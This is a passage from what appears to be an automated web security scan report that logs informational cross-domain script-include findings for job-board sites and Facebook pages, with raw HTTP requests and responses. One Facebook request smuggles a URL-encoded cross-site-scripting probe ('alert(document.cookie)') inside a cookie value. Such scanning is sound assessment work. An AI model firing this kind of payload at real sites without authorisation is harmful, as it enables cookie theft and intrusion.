http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.environmentalcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:07 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=dq6vrirkde3igauguqgj7gjfh0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:07 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:07 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:07 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:07 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:07 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:07 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:07 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:07 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 103899

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.333. http://www.environmentalsafetyhealthcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.environmentalsafetyhealthcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.environmentalsafetyhealthcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:13 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=kinch90afsop9ot95vej0stu73; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:13 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:13 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:13 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:13 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:13 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:13 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:13 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:13 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109299

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.334. http://www.ericmmartin.com/projects/simplemodal/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ericmmartin.com
Path:	/projects/simplemodal/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js?ver=1.4.3
http://platform.twitter.com/widgets.js
http://s7.addthis.com/js/250/addthis_widget.js?pub=emartin24&ver=3.0.2
http://stats.wordpress.com/e-201103.js

Request

GET /projects/simplemodal/ HTTP/1.1
Host: www.ericmmartin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:09:51 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
X-Pingback: http://www.ericmmartin.com/wordpress/xmlrpc.php
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Fri, 21 Jan 2011 20:01:28 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 34881

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

<title>SimpleModal / Eric Martin / ericmmartin.com</title>

<meta name="author" content="Eric Ma
...[SNIP]...
<link rel='stylesheet' id='emm-v3-css' href='http://www.ericmmartin.com/wordpress/wp-content/themes/emm-v3/style.css?ver=1.0.16' type='text/css' media='all' />
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js?ver=1.4.3'></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://s7.addthis.com/js/250/addthis_widget.js?pub=emartin24&ver=3.0.2'></script>
...[SNIP]...
<script src="http://stats.wordpress.com/e-201103.js" type="text/javascript"></script>
...[SNIP]...

15.335. http://www.erpcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.erpcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.erpcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:16 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=f4lggi6e8n8h982dg6rfsp1522; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:16 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:16 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:16 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:16 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:16 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:16 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:16 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:16 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 116111

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.336. http://www.execcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.execcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.execcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:21 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=sedi04t58r2ut89pg242blpvl1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:21 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:21 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:21 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:21 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:21 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:21 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:21 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:21 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 130348

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.337. http://www.facebook.com/BMWUSA previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/BMWUSA

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js

Request

Response

15.338. http://www.facebook.com/EmploymentXing previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/EmploymentXing

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js

Request

Response

15.339. http://www.facebook.com/pages/JD2B/298408284363 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/JD2B/298408284363

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js

Request

Response

15.340. http://www.facebook.com/piyush.v.bhatt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/piyush.v.bhatt

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js

Request

Response

15.341. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js

Request

Response

15.342. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js

Request

Response

15.343. http://www.facebook.com/yahoonews previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/yahoonews

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js

Request

GET /yahoonews HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dtheclicker.todayshow.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Ftheclicker.todayshow.com%252F%253F28d8a%252522%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E1b20a3de4c0%253D1%26extra_2%3DUS;

Response

15.344. http://www.facilitiescrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facilitiescrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.facilitiescrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:50 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=nc6a2h1em6s3batcv6fjsg17b1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:50 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:50 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:50 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:50 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:50 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:50 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:50 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:50 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 117478

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.345. http://www.financialservicescrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.financialservicescrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.financialservicescrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:51 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=qsnigj0dejirrlqc4mq67l7kd4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:51 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:51 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:51 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:51 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:51 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:51 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:51 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:51 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 117666

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.346. http://www.foodservicescrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.foodservicescrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.foodservicescrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:53 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=eh1vjkcudnunpfbo2nu0rbgdm5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:53 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:53 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:53 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:53 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:53 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:53 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:53 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:53 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 110006

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.347. http://www.fundraisingcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fundraisingcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.fundraisingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:27:23 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=8b0film2tj8qfoehbgchdt1as6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:27:24 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:27:24 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:27:24 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:27:24 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:27:24 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:27:24 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:27:24 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:27:24 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 97962

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
